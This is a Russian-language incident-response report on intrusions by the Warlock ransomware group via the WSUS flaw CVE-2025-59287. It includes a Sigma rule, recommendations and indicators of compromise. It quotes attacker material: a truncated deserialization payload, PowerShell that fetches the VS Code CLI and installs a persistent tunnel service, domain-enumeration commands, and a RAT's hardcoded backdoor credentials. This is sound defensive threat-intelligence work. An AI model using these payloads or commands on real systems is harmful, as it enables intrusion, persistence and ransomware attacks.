Как Warlock атакуют вашу инфраструктуру

Владимир Авдеев, эксперт по реагированию на инциденты, и Александр Гантимуров, руководитель направления обратной разработки Angara MTDR, рассказывают об инцидентах с участием группировки Warlock.

Вместо эпилога

1. Сколько проходит часов после публикации POC до начала сканирования? 2 часа.

2. Сколько у вас есть времени, перед тем как Warlock пошифруют всё? 2 дня.

3. Как проникают? CVE-2025-59287.

4. Какими инструментами пользуются? WarlockRAT, Warlock Cryptor + куча свободных утилит.

В ноябре 2025 года эксперты по реагированию на инциденты Angara MTDR столкнулись с несколькими инцидентами с участием группировки Warlock (также отслеживаемые как Lenient Wolf, Storm-2603, GOLD SALEM). Данный кластер активности использует уязвимости внешнего контура как один из первоначальных векторов атак, например, CVE-2023-24955, CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, CVE-2025-53771, в опубликованном веб‑приложении SharePoint. В октябре 2025 года этот ряд пополнился свежей уязвимостью WSUS — CVE-2025-59287, которая имеет рейтинг критичности 9,8 из 10 по CVSS.

Атаки отличались коротким временем между проникновением и шифрованием, новыми инструментами и строились по одной модели kill‑chain, которая приведена ниже.

Разберём теперь атаку по этапам.

Reconnaissance

Всё началось 25 октября 2025 года с появления публичной версии PoC эксплойта для WSUS.

Буквально через несколько часов после публикации начались массовые сканирования на предмет наличия уязвимости. Компания BitDefender уже 28 октября выпустила отчёт, в котором привела четыре различных сценария действий злоумышленников, но без привязки к конкретным группировкам. Как показали наши расследования, сценарий D в отчёте BitDefender в точности соответствовал действиям группировки Warlock.

Сразу после обнародования уязвимости вышло несколько подробных статей о том, чем она грозит и на чём основана. Основная часть уязвимости связана с передачей данных для десериализации через класс .NET BinaryFormatter. Данные передаются в WSUS в виде SOAP‑запроса, который будет сохранён в базе данных WSUS. Группировка Warlock обычно подчищала за собой журналы системы, но, к счастью, в большинстве своих атак база данных WSUS оставалась нетронутой.

Высока вероятность, что вся нагрузка в формате для BinaryFormatter генерировалась при помощи инструмента YSoNet или YSoSeria.Net.

При первичном сканировании всем WSUS‑серверам отсылалась библиотека, которая должна была внедриться в процесс w3wp.exe. При наличии уязвимости и удачном внедрении в заголовок HTTP‑ответа сервера добавлялось поле PaloAltoNetworkAST: vulnerable.

Проверка уязвимости

Уже 25 октября на VirusTotal была загружена библиотека, которая была использована для проверки.

Initial Access

Спустя несколько часов выявленным уязвимым серверам приходил ещё один запрос, но уже с другой вредоносной нагрузкой.

<?xml version="1.0" encoding="utf-16"?>
 <ArrayOfString xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <string>Administrator=SYSTEM</string>
  & <string>SynchronizationUpdateErrorsKey=&lt;SOAP-ENV:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" 
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" 
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt;&lt;
SOAP-ENV:Body&gt;&lt;a1:DataSet id="ref-1" 
xmlns:a1="http://schemas.microsoft.com/clr/nsassem/System.Data/
System.Data%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20
PublicKeyToken%3Db77a5c561934e089"&gt;&lt;DataSet.RemotingFormat 
xsi:type="a1:SerializationFormat" 
xmlns:a1="http://schemas.microsoft.com/clr/nsassem/System.Data/System.Data
%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20
PublicKeyToken%3Db77a5c561934e089"&gt;Binary&lt;
/DataSet.RemotingFormat&gt;&lt;DataSet.DataSetName id="ref-3"&gt;&lt;/
DataSet.DataSetName&gt;&lt;DataSet.Namespace 
href="#ref-3"/&gt;&lt;DataSet.Prefix href="#ref-3"/&gt;&lt;
DataSet.CaseSensitive&gt;false&lt;/DataSet.CaseSensitive&gt;&lt;
DataSet.LocaleLCID&gt;1033&lt;/DataSet.LocaleLCID&gt;&lt;
DataSet.EnforceConstraints&gt;false&lt;/DataSet.EnforceConstraints&gt;&lt;
DataSet.ExtendedProperties xsi:type="xsd:anyType" xsi:null="1"/&gt;&lt;
DataSet.Tables.Count&gt;1&lt;/DataSet.Tables.Count&gt;&lt;DataSet.Tables_0 
href="#ref-4"/&gt;&lt;/a1:DataSet&gt;&lt;SOAP-ENC:Array id="ref-4" 
xsi:type="SOAP-ENC:base64"&gt;
AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCw...
CBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAAWFByZXNlbnRhM1NjE5MzRlMDg5
XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==
&lt;/SOAP-ENC:Array&gt;&lt;/SOAP-ENV:Body&gt;&lt;/SOAP-ENV:Envelope&gt;
</string>
</ArrayOfString>

Об успешной эксплуатации уязвимости можно узнать из журнала WSUS C:\Program Files\Update Services\LogFiles\SoftwareDistribution.log, в котором будет отражена ошибка десериализации объекта.

Отследить такую активность в реальном времени без дополнительных инструментов в виде должного централизованного мониторинга инфраструктуры и оперативного анализа событий с конечных узлов — нетривиальная задача. Эффективное обнаружение и противодействие требует корреляции событий из различных источников:

• проверка событий безопасности, связанных с процессами (например, Sysmon EventID 1, EventID 4688),

• запуск и выполнение команд PowerShell (PowerShell EventID 4103, 4104, 400, 600).

Критически важным является мониторинг не только прямого запуска PowerShell из WSUS‑компонентов, но и косвенных цепочек, где атакующие используют промежуточные стадии для обхода простых детектов.

Наблюдаемые паттерны выполнения через процессы WSUS и компонентов Internet Information Services (IIS):

• wsusservice.exe → powershell.exe

• w3wp.exe → powershell.exe

• wsusservice.exe → cmd.exe → cmd.exe → powershell.exe

• w3wp.exe → cmd.exe → cmd.exe → powershell.exe

Пример правила Sigma:

title: WSUS Suspicious Process Chain - CVE-2025-59287
description: Detects multi-stage process chains from WSUS components
detection:
  parent_processes:
    ParentImage|endswith:
      - '\wsusservice.exe'
      - '\w3wp.exe'
  suspicious_chains:
    - sequence:
        - Image|endswith: '\cmd.exe'
        - Image|endswith: '\cmd.exe'
        - Image|endswith: '\powershell.exe'
    - sequence:
        - Image|endswith: '\powershell.exe'
    - sequence:
        - Image|endswith: '\wscript.exe'
        - Image|endswith: '\powershell.exe'
  condition: parent_processes and suspicious_chains

Внедрение подобных правил в сочетании с полноценным сбором аудит‑логов позволяет значительно снизить время обнаружения атаки и минимизировать потенциальный ущерб от эксплуатации CVE-2025-59287.

Execution

Первоначально злоумышленники проверяли доступность своего сервера со стороны скомпрометированного сервера. А потом приходила закодированная в BinaryFormatter последовательность команд для cmd, по результатам исполнения которой на сервер загружался и запускался агент Apollo для Mythic Framework.

Дополнительно на заражённые машины мог доставляться разработанный злоумышленниками троян для удалённого доступа (Remote Access Trojan, RAT), который мы назвали WarlockRAT. WarlockRAT написан на .NET и предназначен для повышения привилегий, организации HTTP‑туннелей в инфраструктуру, загрузки и запуска произвольных команд. Иногда WarlockRAT был дополнительно обёрнут в библиотеку, которая загружала его в контексте процесса IIS.

Кроме WarlockRAT, который позволял скачивать и запускать программы, загружался установщик Velociraptor. Сам по себе Velociraptor — продвинутый инструмент для цифровой криминалистики и реагирования на инциденты, который используется для сбора криминалистически значимых данных с конечных устройств. Однако в нашем случае атакующие используют его для управления скомпрометированной системой, а также для дозагрузки других утилит и вредоносных файлов. Стоит подчеркнуть, что коллеги из Solar 4RAYS в своём блоге уже отмечали изобретательность группировок, использующих данный инструмент в своих целях, которые зачастую отличаются от заложенного в легитимный инструмент функционала.

Адрес управляющего сервера атакующих содержался в конфигурационном файле Velociraptor, настроенном на взаимодействие с update.githubtestbak.workers[.]dev. Примечательным фактом является использование злоумышленниками этого инструмента версии 0.73.4. Именно она подвержена серьёзной уязвимости с идентификатором CVE‑2025‑6264, которая позволяет повысить привилегии в системе и выполнять впоследствии произвольные команды.

Впоследствии в заражённой инфраструктуре запускалось множество утилит для сбора информации, дальнейшего распространения и повышения привилегий.

Persistence

В WarlockRAT заложена возможность создания учётной записи администратора с заданным в коде именем adminbak2 и паролем 937ZZXX12@1cez@41, которая будет использоваться для дальнейшего распространения.

Создание учётной записи можно вызвать путём запуска WarlockRat с соответствующим аргументом командной строки или по команде оператора.

Дополнительно злоумышленники создавали сервисы Windows, которые запускали утилиты туннелирования в скомпрометированной инфраструктуре.

Privilege Escalation

WarlockRAT содержит функциональность по краже маркеров доступа (токенов) и повышение привилегий при создании процессов, которые основаны на EfsPotato.

Кроме этого, через групповые политики Active Directory распространялись скрипты по добавлению скомпрометированных учётных записей в группы администраторов.

Defense Evasion

Через GPO также осуществлялось отключение привилегированных учётных записей, антивирусной защиты и изменялись настройки межсетевого экрана.

В последнем случае через Windows Firewall открывали порт 3389 для всех входящих подключений.

Для обхода механизма аутентификации Kerberos использовался Skeleton Key: в память процесса lsass.exe внедрялся мастер‑ключ, который можно использовать для аутентификации в качестве любого пользователя в домене.

Discovery

Получив доступ в систему, злоумышленник осуществлял типичный набор действий:

• собирал информацию об инфраструктуре Active Directory и учётных данных;

• получал список пользователей и групп;

• загружал дополнительные утилиты для туннелирования, получения реквизитов учётных записей и эксфильтрации.

Сбор информации о системе

В WarlockRAT встроен свой сборщик функционала о заражённой системе, который:

• собирает список процессов;

• собирает информацию об активных сессиях пользователей;

• выводит список сетевых интерфейсов;

• получает информацию об активных соединениях.

В ходе расследования выявлены факты сбора информации через командный интерпретатор:

whoami
hostname
ipconfig /all
tasklist /svc
net user
wmic product get name,identifyingnumber
(Get-ADComputer -Filter "DNSHostName -like '*' -and Enabled -eq '$true'") |
 Select-Object DNSHostName

Сбор информации Active Directory

Active Directory могла исследоваться через командный интерпретатор:

net group "domain computers"
net group "domain controllers"
quser
net group "domain admins" /do
nltest /domain_trusts

А также через ADExplorer, который доставлялся дополнительно.

Credential Access

Чаще всего злоумышленники получали учётные данные через дамп памяти процесса LSASS при помощи встроенного модуля в NetExec.

Для получения административного доступа к серверу VMware ESXi могла использоваться уязвимость с идентификатором CVE‑2024‑37085. Эта уязвимость позволяет злоумышленникам скомпрометировать учётные записи пользователей и автоматически добавлять их в группу ESX Admins, которая обладает расширенными правами администратора в системе ESXi.

В одном из случаев Warlock собирал учётные данные из установленного Veeam Backup and Replication при помощи скриптов PowerShell.

Command-and-Control

Для удалённого доступа к инфраструктуре использовались:

• Velociraptor;

  Apollo для Mythic Framework;

• WarlockRAT;

• HTTP‑туннели через IIS.

Злоумышленники активно использовали легитимные протоколы (HTTPS, DNS) для маскировки управляющего трафика. В ряде случаев применялись домены с динамическими DNS‑сервисами для ротации управляющих серверов.

Сбор информации о системе

Кроме RAT, злоумышленники Warlock загружали следующий набор утилит:

• JSTokenUtil — для работы с токенами пользователей;

• OXIDScan — для сканирования внутри сети;

• ADExplorer — для сбора информации из Active Directory;

• NetExec и PsExec — для дальнейшего распространения;

• AdvancedRun — для запуска программ от администратора;

• SharpNamedPipePTH и Skeleton Key — для проведения атак на Kerberos;

• Chrome Remote Desktop — для удалённого управления скомпрометированными устройствами;

• Cloudflared, wsocks, wstunnel и VSCode-cli — для туннелирования.

В одном из инцидентов Warlock не постеснялись установить OpenSSH Server и браузер Google Chrome, при помощи которого осуществлялся доступ к веб-интерфейсам внутри атакованной инфраструктуры.

Туннелирование

Если WarlockRAT запущен в контексте процесса IIS, то он может создавать HTTP-туннели внутрь инфраструктуры. Код для туннелирования позаимствован у китайского инструмента Suo5.

Кроме этого, для туннелирования использовались cloudflared, wsocks, wstunnel и даже VSCode.

VSCode использовался для создания туннелей .devtunnels.ms аналогично одноимённому инструменту dev-tunnels и развёртывался через PowerShell.

Invoke-WebRequest -Uri 
"https://vscode.download.prss.microsoft.com/dbazure/download/
insider/09401e712d4ffa5e497787978fe90c1557a0092b/vscode_cli_win32_x64_cli.zip" 
-OutFile "C:\ProgramData\Microsoft\AppV\code.exe"
Expand-Archive C:\ProgramData\Microsoft\AppV\code.exe -DestinationPath 
C:\ProgramData\Microsoft\AppV\
move C:\ProgramData\Microsoft\AppV\code.exe C:\ProgramData\Microsoft\AppV\code.zip
Expand-Archive C:\ProgramData\Microsoft\AppV\code.zip -DestinationPath 
C:\ProgramData\Microsoft\AppV\
C:\ProgramData\Microsoft\AppV\code.exe tunnel user login --provider github
cd C:\ProgramData\Microsoft\AppV\
ls
C:\ProgramData\Microsoft\AppV\code-insiders.exe tunnel user login --provider github
New-Service -Name "VScode" -BinaryPathName 
"C:\ProgramData\Microsoft\AppV\code-insiders.exe tunnel service 
install --accept-server-license-terms" -DisplayName "Vscode Service" 
-Description "Runs Windows Vscode" 
-StartupType Automatic
Start-Service -Name "VScode"
C:\ProgramData\Microsoft\AppV\code-insiders.ex tunnel service install 
--accept-server-license-terms
cmd /c C:\ProgramData\Microsoft\AppV\code-insiders.ex tunnel service install 
--accept-server-license-terms
C:\ProgramData\Microsoft\AppV\code-insiders.exe tunnel service install 
--accept-server-license-terms

Если о dev-tunnels совсем недавно рассказывали Олег Скулкин из BI.ZONE на SOCFORUM2025 и наши коллеги из Positive Technologies, то использование vscode-cli мы видели впервые. Стоит отметить, что атакующие использовали более гибкую версию автономной командной строки Insiders, где службы Dev Tunnels полностью интегрированы. Кроме того, в скомпрометированной системе может присутствовать журнал службы туннелирования, содержащий подробную техническую информацию о работе туннелей, в том числе адреса серверов Microsoft, публичный URL-адрес туннеля, а также время его запуска.

Ещё одной примечательной утилитой является wsocks, которая Microsoft Defender определяется как BlunderBlight. Она обеспечивала туннелирование к скомпрометированной инфраструктуре по протоколу websocket. Причём в одном исполняемом файле реализована функциональность и сервера, и клиента. Wsocks также обладает возможностью устанавливаться как сервис при запуске с соответствующими аргументами командной строки.

Lateral movement

Кроме созданных учётных записей администраторов, для дальнейшего распространения использовались PsExec и NetExec.

При этом применяли достаточно шумные и легко обнаруживаемые методы, такие как установка вредоносного ПО и интенсивное сканирование внутренней сети. Эти действия создают заметный трафик и аномалии в работе систем, которые при адекватной настройке и внимательном мониторинге должны были вызвать тревогу у специалистов по безопасности. Однако в данном случае отсутствовала опытная команда, которая постоянно отслеживала бы подобные подозрительные активности и своевременно реагировала на них. Из-за этого атака осталась незамеченной на ранних этапах, что позволило злоумышленникам беспрепятственно распространяться по инфраструктуре и захватывать ресурсы.

Pass the Hash

Warlock проводили атаки на Kerberos Pass the Hash при помощи SharpNamedPipePTH.

Exfiltration

Для вывода данных использовались:

• зашифрованные архивы, передаваемые через HTTPS;

• DNS‑туннелирование для передачи небольших объёмов критичных данных;

• облачные хранилища (подставные аккаунты на популярных сервисах).

В одном из инцидентов данные выводились через модифицированный протокол SMB, инкапсулированный в HTTP‑трафик.

Impact

Последствия атак включали:

• шифрование критически важных данных (использование Warlock Cryptor);

• утрату доступа к инфраструктуре (блокировка учётных записей, удаление теневых копий);

• компрометацию учётных данных домена (включая сервисные аккаунты);

• нарушение бизнес‑процессов (простой серверов, потеря данных).

Средний срок восстановления после атаки составлял 3–5 рабочих дней при наличии резервных копий.

Рекомендации по защите

1. Обновление ПО: установка патчей для CVE‑2025‑59287 и других уязвимостей WSUS в течение 24 часов после выпуска.

2. Мониторинг: настройка аудита событий:

   • запуск процессов (Sysmon EventID 1, 4688);

   • активность PowerShell (EventID 4103, 4104);

   • изменения в GPO.

3. Сетевая сегментация: ограничение доступа к WSUS‑серверам только для доверенных IP‑адресов.

4. Резервное копирование: регулярное создание резервных копий с защитой от удаления (например, WORM‑хранилища).

5. Обучение персонала: повышение осведомлённости о фишинговых атаках и методах социальной инженерии.

Выводы

Атаки группировки Warlock демонстрируют:

• высокую скорость эксплуатации уязвимостей (2 часа от публикации PoC до сканирования);

• использование комбинации легитимных инструментов (Velociraptor, Apollo) и кастомных вредоносов;

• эффективность методов уклонения от обнаружения (обход Kerberos, отключение защиты).

Ключевыми факторами успешной защиты остаются:

• оперативное обновление ПО;

• централизованный мониторинг событий;

• регулярное тестирование на проникновение.

MITRE ATT&CK

Индикаторы компрометации

MD5

• 6AE09BB129D251980CD7B19292BE78FB — TokenUtil

• D305AC1E09E8509345B1CA97DD3FE02C — SharpNamedPipePTH

• CC5DF445B75FD50EC4BE4B4346C817C0 — Skeleton Key

• DB89EC570E6281934A5C5FCF7F4C8967 — PsExec

• C563056E9B3BEA79262C49FE3974B92F — Impacket

• 16FB41CF9A652913F1FF186243C48EC0 — Apollo

• 4DD544C3513D0606AF052D33A183A8F2 — OXIDScan

• 3A55D8F8F29716C694671834D8C6CB29 — Velociraptor

• 683103721619B316534115BCC068C7FD — Установщик Velocirapto

• F44E811544362F20AB3C8B9212208AAC — wstunnel

• 99188828B1B7770FDF55CF25442D4C03 — Установщик wsocks

• 599A775770411C012B24E2F8E148D09E — wsocks

• 378C5585CD204E0FF6A28D5E59F5E686 — Rclone

• 4BA756BFF1A78F17AD477D818FE7E283 — MinIO Client

• FFAFBC75A9ECA9E3D145D45970492A6F — Warlock Cryptor

• 94A38EFF715576FFAB05D28C0C638D65 — Warlock Cryptor

• 5380758888DB6538FD0AD75FFFF59587 — Cloudflared

• A9E390237A96E0C6655B1A06F8D72C6F — ADExplorer

• 2661F8272ADA236CF3AEB9CE9323626C — ADExplorer

• 8E024A4C90F17F1AEDC7FC53D5CA23C6 — NetExec

• 3F44DD7F287DA4A9A1BE82E5178B7DC8 — AdvancedRun

• FD91321BF7FF7245DDA9B7B5D791ACE8 — WarlockRAT

• 7CA608465E3C860A43EAF133E53EB745 — библиотеки для проверки на уязвимость

• 271DD648F947CD021B9C814ACAA816F7 — библиотеки для проверки на уязвимость

SHA-1

• 0FF4D4DEDF275669ACAB299BD2635A1425FA8DC2 — TokenUtil

• 6C7F62679D84C7B365FBB666D6A09D3A526AE374 — SharpNamedPipePTH

• 363761519F0770596ABF717BDEC29997DB10C260 — Skeleton Key

• 0098C79E1404B4399BF0E686D88DBF052269A302 — PsExec

• B435DB186106FBB053CE6D1D9178D642792E9723 — Impacket

• 1865AA09A523195B86D4C8A0554282DB16A937D8 — Apollo

• 9354804225E2168FF3E971E672F1E112C8A84F07 — OXIDScan

• AA0B7D4D3E1638A9C622779D27B5EE9118352B6E — Velociraptor

• C8F2DCEC692B82AFA1FE9BF286EAD6585269B7AB — установщик Velociraptor

• 9335CA254AF61F9B9D52079CD387FCA25D04F468 — wstunnel

• 098306E1A34022E0C3654C2839757C3F1ABBE184 — установщик wsocks

• 75787A3ADC1063D750C3139F764A14D2920A30AB — wsocks

• 259B9AD407D8626FD18F956021F49314BCC3A880 — Rclone

• 0D385213A4BB59E6E1B36667B48D924F33D24E90 — MinIO Client

• 56134D9FC68FF7EA70F4B14C9DA8A5946D32BEF1 — Warlock Cryptor

• 85C05B9E848F33B715E1B0AE4C8D4B744F8EA1A0 — Warlock Cryptor

• D530931F9679F8EF6DCE30E47DEE5C94A990ACF1 — Cloudflared

• 6B242AD80260F3CB3E67A1D2A1EE164DE465C76E — ADExplorer

• 98683C358724EDA64BD5C1DF5DF6D2AF8BCEDD15 — ADExplorer

• 44F3067C0AE0F5BB46B1C5455F881EB646FBA782 — NetExec

• 996FCF7B6C0A5ED217A46B013C067E0C1FE3EBA9 — AdvancedRun

• 69FA8DEC978938629F1AECAB9154603C4BFB55D7 — WarlockRAT

• 70D91B700189E2EE546A129CF6C13B77B9C9BCE7 — библиотека для проверки на уязвимость

• C55C826F626E6891E0B8CDD79D8F13B30FF78439 — библиотека для проверки на уязвимость

Сетевые индикаторы:

• filebin[.]net — ресурс для обмена файлами

• 168.231.117[.]229 — C2 Warlock

• 162.252.199[.]85 — C2 Warlock

• upload.jbowpxyy.workers[.]dev — адрес загрузки Velociraptor

• royal-boat-bf05.qgtxtebl.workers[.]dev — адрес загрузки Velociraptor

• update.githubtestbak.workers[.]dev — адрес управляющего сервера Velociraptor

• *.devtunnels[.]ms — адреса серверов Dev Tunnels

• 93.127.214[.]58 — C2 Apollo

• esx-enterprise[.]com — C2 Apollo

• loglog.ac.d189493a.digimg[.]store — C2 Warlock

• wsus.ac.d189493a.digimg[.]store — C2 Warlock

• 134.209.107[.]209 — C2 Warlock

Источник